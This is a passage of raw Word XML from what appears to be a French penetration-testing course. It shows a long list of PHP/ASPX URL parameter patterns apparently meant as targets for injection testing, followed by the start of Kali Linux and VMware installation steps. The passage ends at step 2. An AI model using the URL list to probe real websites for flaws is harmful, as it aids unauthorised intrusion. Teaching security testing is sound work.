          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E7E7E0"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topic.php?ID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B73FD0"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tuangou.php?bookid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1817D453"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type.php?iType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65392BBF"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updatebasket.php?bookid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D50360C"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updates.php?ID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69364745"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view.php?cid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625904E5"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view_cart.php?title</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1DB570"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view_detail.php?ID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC640E8"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viewcart.php?CartId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B4FF76"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viewCart.php?userID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B94363"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viewCat_h.php?idCategory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525AE78F"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viewevent.php?EventID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04723471"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viewitem.php?recor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C527E36"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viewPrd.php?idcategory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C0A911"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ViewProduct.php?misc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4122EE02"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voteList.php?item_ID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74118DE0"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whatsnew.php?idCategory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607CD1B2"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WsAncillary.php?ID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F85754D"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WsPages.php?ID</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noticiasDetalle.php?xid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF1EA6F"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sitio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>item.php?idcd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BB6789"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index.php?site</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147FC9FD"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r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>de/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>content.php?page_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0574B2E0"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gallerysort.php?iid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FEE52F"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docDetail.aspx?chnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AB238E"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t>index.php?section</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617FAC24" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="002C0254" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="PrformatHTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F2F0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>index.php?page</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FBCBB3" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BC27E13" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F6B760A" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C4EDC">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>B. Installation Kali Linux :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589C675A" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0335BC25" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007349C8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Ici, nous allons voir comment </w:t>
      </w:r>
      <w:r w:rsidRPr="007349C8">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="22313F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>installer Kali Linux sur votre système Windows avec le logiciel VMWare</w:t>
      </w:r>
      <w:r w:rsidRPr="007349C8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7F7FC1" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="007349C8" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1954DE51" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="006090"/>
          <w:u w:val="single"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007349C8">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="006090"/>
          <w:u w:val="single"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Etape 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E193AD" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="007349C8" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53EB5446" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="007349C8" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007349C8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Commencez par </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="007349C8">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
            <w:color w:val="044ACD"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>télécharger Vmware</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007349C8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. VMWare player est gratuit mais pas libre, vous devrez quand même vous enregistrer pour générer une clé d'activation qui vous sera demandée lors de l'installation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060CE803" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="007349C8" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007349C8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Ensuite </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="007349C8">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
            <w:color w:val="044ACD"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>télécharger le fichier ISO de kali linux</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007349C8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. Le fichier occupe plus de 3 Go. On enregistre le fichier qui pourra être réutilisé dans un répertoire spécial nommé “Image disque” par exemple.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382D61C1" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007349C8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Une fois téléchargé Vmware, lancer l’installation en double cliquant sur l’exécutable. Continuer les étapes en cliquant sur Next </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007349C8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Next</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007349C8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>, Finish. Vmware Player est désormais installé sur votre ordinateur. Ouvrez Vmware et cliquez sur "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007349C8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Create</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007349C8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> New Virtual Machine".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400BF876" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2647AE6C" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28968222" wp14:editId="310B296B">
            <wp:extent cx="5760720" cy="36766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676650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FB19C3" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A180DFB" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57DD1C3E" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="589149FE" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58D07C73" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51432630" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="007349C8" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="22313F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007349C8">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006090"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Etape 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181CD42F" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="22313F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007349C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="22313F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
